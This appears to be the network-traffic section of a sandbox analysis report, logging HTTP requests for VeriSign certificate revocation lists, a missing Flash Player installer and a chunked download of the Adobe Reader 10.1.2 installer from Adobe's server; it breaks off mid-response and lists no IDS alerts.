IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "a734771f14845f861a60ddbe6518dcb1:1469523919"
Last-Modified: Tue, 26 Jul 2016 09:05:19 GMT
Date: Tue, 26 Jul 2016 16:17:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
<<< skipped >>>
GET /pca3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "6df834358a0bb5e934947d15c0372dc3:1466795723"
Last-Modified: Fri, 24 Jun 2016 19:15:23 GMT
Date: Tue, 26 Jul 2016 16:17:49 GMT
Content-Length: 933
Connection: keep-alive
Content-Type: application/pkix-crl
<<< skipped >>>
GET /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: fpdownload.macromedia.com
Connection: keep-alive
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 276
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 26 Jul 2016 16:16:59 GMT
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /get/flashplayer/current/licensing/win/install_flash_player_11_plugin_32bit.exe was not found on this server.</p>.</body></html>...
HEAD /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Length: 53784984
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:00 GMT
Connection: keep-alive
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=0-1048575
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:00 GMT
Content-Range: bytes 0-1048575/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=1048576-2097151
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:01 GMT
Content-Range: bytes 1048576-2097151/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=2097152-3145727
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:01 GMT
Content-Range: bytes 2097152-3145727/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=3145728-4194303
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:02 GMT
Content-Range: bytes 3145728-4194303/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=4194304-5242879
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:02 GMT
Content-Range: bytes 4194304-5242879/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=5242880-6291455
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:03 GMT
Content-Range: bytes 5242880-6291455/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=6291456-7340031
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:03 GMT
Content-Range: bytes 6291456-7340031/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=7340032-8388607
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:03 GMT
Content-Range: bytes 7340032-8388607/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=8388608-9437183
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:04 GMT
Content-Range: bytes 8388608-9437183/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=9437184-10485759
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:04 GMT
Content-Range: bytes 9437184-10485759/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=10485760-11534335
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:05 GMT
Content-Range: bytes 10485760-11534335/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=11534336-12582911
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:05 GMT
Content-Range: bytes 11534336-12582911/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=12582912-13631487
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:06 GMT
Content-Range: bytes 12582912-13631487/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=13631488-14680063
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:06 GMT
Content-Range: bytes 13631488-14680063/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=14680064-15728639
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:07 GMT
Content-Range: bytes 14680064-15728639/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=15728640-16777215
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:07 GMT
Content-Range: bytes 15728640-16777215/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=16777216-17825791
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:08 GMT
Content-Range: bytes 16777216-17825791/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=17825792-18874367
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:08 GMT
Content-Range: bytes 17825792-18874367/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=18874368-19922943
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:09 GMT
Content-Range: bytes 18874368-19922943/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=19922944-20971519
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:09 GMT
Content-Range: bytes 19922944-20971519/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=20971520-22020095
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:10 GMT
Content-Range: bytes 20971520-22020095/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=22020096-23068671
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:10 GMT
Content-Range: bytes 22020096-23068671/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=23068672-24117247
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:11 GMT
Content-Range: bytes 23068672-24117247/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=24117248-25165823
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:11 GMT
Content-Range: bytes 24117248-25165823/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=25165824-26214399
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:12 GMT
Content-Range: bytes 25165824-26214399/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=26214400-27262975
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:12 GMT
Content-Range: bytes 26214400-27262975/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=27262976-28311551
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:13 GMT
Content-Range: bytes 27262976-28311551/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=28311552-29360127
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:13 GMT
Content-Range: bytes 28311552-29360127/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=29360128-30408703
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:14 GMT
Content-Range: bytes 29360128-30408703/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=30408704-31457279
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:14 GMT
Content-Range: bytes 30408704-31457279/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=31457280-32505855
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:15 GMT
Content-Range: bytes 31457280-32505855/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=32505856-33554431
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:15 GMT
Content-Range: bytes 32505856-33554431/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=33554432-34603007
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:16 GMT
Content-Range: bytes 33554432-34603007/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=34603008-35651583
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
